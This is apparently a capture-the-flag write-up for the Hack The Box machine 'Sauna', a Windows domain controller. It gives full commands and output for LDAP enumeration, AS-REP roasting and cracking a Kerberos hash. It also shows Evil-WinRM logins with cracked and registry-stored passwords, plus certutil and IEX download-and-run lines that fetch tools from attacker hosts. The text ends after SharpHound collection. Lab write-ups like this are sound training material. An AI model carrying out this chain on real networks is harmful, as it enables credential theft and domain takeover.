As always we start with an nmap scan
# Nmap 7.80 scan initiated Tue Feb 18 03:17:50 2020 as: nmap -A -oN allports 10.10.10.175 Nmap scan report for 10.10.10.175 Host is up (0.076s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-18 16:19:56Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=2/18%Time=5E4B9DC1%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 8h01m51s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-02-18T16:22:19 |_ start_date: N/A TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 100.30 ms 10.10.16.1 2 100.29 ms 10.10.10.175 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Feb 18 03:23:06 2020 -- 1 IP address (1 host up) scanned in 317.70 seconds
The most interesting ports open were: HTTP(80), Kerberos(88) and Win-RM (5985) .
User
I enumerated the Ldap port:
A lot of information was returned, but the most interesting part was:
root@kali:~/htb/sauna# ldapsearch -h 10.10.10.175 -p 389 -x -b "dc=EGOTISTICAL-BANK,dc=LOCAL" > ldaplogall.txt root@kali:~/htb/sauna# ls allports ldaplogall.txt # Hugo Smith, EGOTISTICAL-BANK.LOCAL dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
Now we have a possible username: “ Hugo Smith ”.
If you try to ASREPRoast that user you will find that it doesn’t exist. So I tried variations of the name and found one that was indeed a valid user: hsmith .
Variations I tried:
Hugo Smith HugoSmith hugo.smith h.smith hsmith smithh smith.h smith.hugo smithhugo smith hugo
Found user:
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/ -usersfile hugosmith.txt Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] invalid principal syntax
So, now we have a valid user “ hsmith ” but no password…
It’s time to take a look to the web server. In there you will only find a few html pages, some
of them contains interesting names:
So, that we know the format that is being used to create the usernames, let’s check this usernames:
fsmith scoins sdriver btaylor hbear
We found that the user “ fsmith ” is vulnerable to ASREProast and we have obtained the crackable “hash”.
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.LOCAL/FSmith Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Getting TGT for FSmith $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:cb52c62c6143cf4cc4c71dccf64756f5$d216f5b0ae6326c1a3027dd19f3976e5a8259a5a1c4118f7f61da536f069ac63b15d65498c22399ff1d985819c280dbda2b88236429eaf03d4b1e25b7ba49323a378e4854c3e0b26b6ec7bb4c5245651e32ffb84025e34d9b05db659e80f2b510ccfcb3e0274b13fff13b6e650a987cb2d73f8288239ca15f7aa19e0914f48e5ccfe49af81e1aaf2f3864ed48ebe21e8f32258eeedcf7924022213178f4175dafd77b97dae029dbf57648cafd31769624759538c9f56a92cbf3bb52af1c19488fc633abedb85df88b6297cd921006a2e0706f20ae5a05d5091feeee6870ff014496e38ba7b397d90e4a42bb46940b2cecda70ac4de67dd1ed817028f37cbe46b
So, let’s crack it with john and rockyou:
c:\PENTEST\HASHCAT>hashcat32.exe -m 18200 -a 0 -w 3 EGOTISTICAL-BANK.hash e:\pentest\rockyou.txt --force hashcat (v5.1.0) starting... did not work for me root@kali:~/htb/sauna# john ego.hash -wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Thestrokes23 ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL) 1g 0:00:00:33 DONE (2020-02-18 04:48) 0.02995g/s 315720p/s 315720c/s 315720C/s Thines..Theredwolf_120691 Use the "--show" option to display all of the cracked passwords reliably Session completed
Credentials found: fsmith:Thestrokes23
Now, just connect via Win-RM and grab the user flag:
root@kali/opt/evil-winrm# ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i EGOTISTICAL-BANK.LOCAL *Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt 1b5520b98d97cf17f24122a55baf70cf *Evil-WinRM* PS C:\Users\FSmith\desktop> certutil -urlcache -split -f http://10.10.14.10/WINPEAS.exe C:\Users\FSmith\Documents\WINPEAS.exe
Root
I started enumerating the box using winPEAS
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winpeas.exe systeminfo userinfo ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD Creating Dynamic lists, this could take a while, please wait... - Checking if domain... - Getting Win32_UserAccount info... --snip-- [+] RDP Sessions(T1087&T1033) Not Found [+] Ever logged users(T1087&T1033) [X] Exception: System.Management.ManagementException: Access denied at System.Management.ThreadDispatch.Start() at System.Management.ManagementScope.Initialize() at System.Management.ManagementObjectSearcher.Initialize() at System.Management.ManagementObjectSearcher.Get() at winPEAS.UserInfo.GetEverLoggedUsers() Not Found [+] Looking for AutoLogon credentials(T1012) Some AutoLogon credentials were found!! DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround!
or it can be done manually
*Evil-WinRM* PS C:\Users\FSmith\Documents> REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon AutoRestartShell REG_DWORD 0x1 Background REG_SZ 0 0 0 CachedLogonsCount REG_SZ 10 DebugServerCommand REG_SZ no DefaultDomainName REG_SZ EGOTISTICALBANK DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager DisableBackButton REG_DWORD 0x1 EnableSIHostIntegration REG_DWORD 0x1 ForceUnlockLogon REG_DWORD 0x0 LegalNoticeCaption REG_SZ LegalNoticeText REG_SZ PasswordExpiryWarning REG_DWORD 0x5 PowerdownAfterShutdown REG_SZ 0 PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16} ReportBootOk REG_SZ 1 Shell REG_SZ explorer.exe ShellCritical REG_DWORD 0x0 ShellInfrastructure REG_SZ sihost.exe SiHostCritical REG_DWORD 0x0 SiHostReadyTimeOut REG_DWORD 0x0 SiHostRestartCountLimit REG_DWORD 0x0 SiHostRestartTimeGap REG_DWORD 0x0 Userinit REG_SZ C:\Windows\system32\userinit.exe, VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile WinStationsDisabled REG_SZ 0 scremoveoption REG_SZ 0 DisableCAD REG_DWORD 0x1 LastLogOffEndTimePerfCounter REG_QWORD 0x8e3982368 ShutdownFlags REG_DWORD 0x80000027 DisableLockWorkstation REG_DWORD 0x0 DefaultPassword REG_SZ Moneymakestheworldgoround! HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey *Evil-WinRM* PS C:\Users\FSmith\Documents>
It found some interesting credentials inside the Winlogon registry:
There isn’t any user called “ svc_loanmanager ” but there is one called “ svc_loanmgr ” svc_loanmgr : Moneymakestheworldgoround!
And you can connect to it with the password extracted from the registry:
You can also use Sharphound to enumerate the Domain and you will find that the user svc_loanmgr has permissions to execute DCSync against the DC:
root@kali:/opt/evil-winrm# ruby evil-winrm.rb -u svc_loanmgr -p "Moneymakestheworldgoround!" -i EGOTISTICAL-BANK.LOCAL Info: Starting Evil-WinRM shell v1.6 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.70/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'" Initializing BloodHound at 5:42 PM on 2/18/2020 Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL Adding Network Credential to connection Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets Building GUID Cache Starting Enumeration for EGOTISTICAL-BANK.LOCAL Adding Network Credential to connection Waiting for enumeration threads to finish Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL Status: 60 objects enumerated (+60 ì/s --- Using 83 MB RAM ) Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:00.4511238 0 hosts failed ping. 0 hosts timedout. Waiting for writer thread to finish Compressing data to C:\Users\svc_loanmgr\Documents\20200218174244_BloodHound.zip. You can upload this file directly to the UI. Finished compressing files!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200218174244_BloodHound.zip Info: Downloading 20200218174244_BloodHound.zip to 20200218174244_BloodHound.zip Info: Download successful! *Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> exit Info: Exiting with code 0 root@kali:/opt/evil-winrm#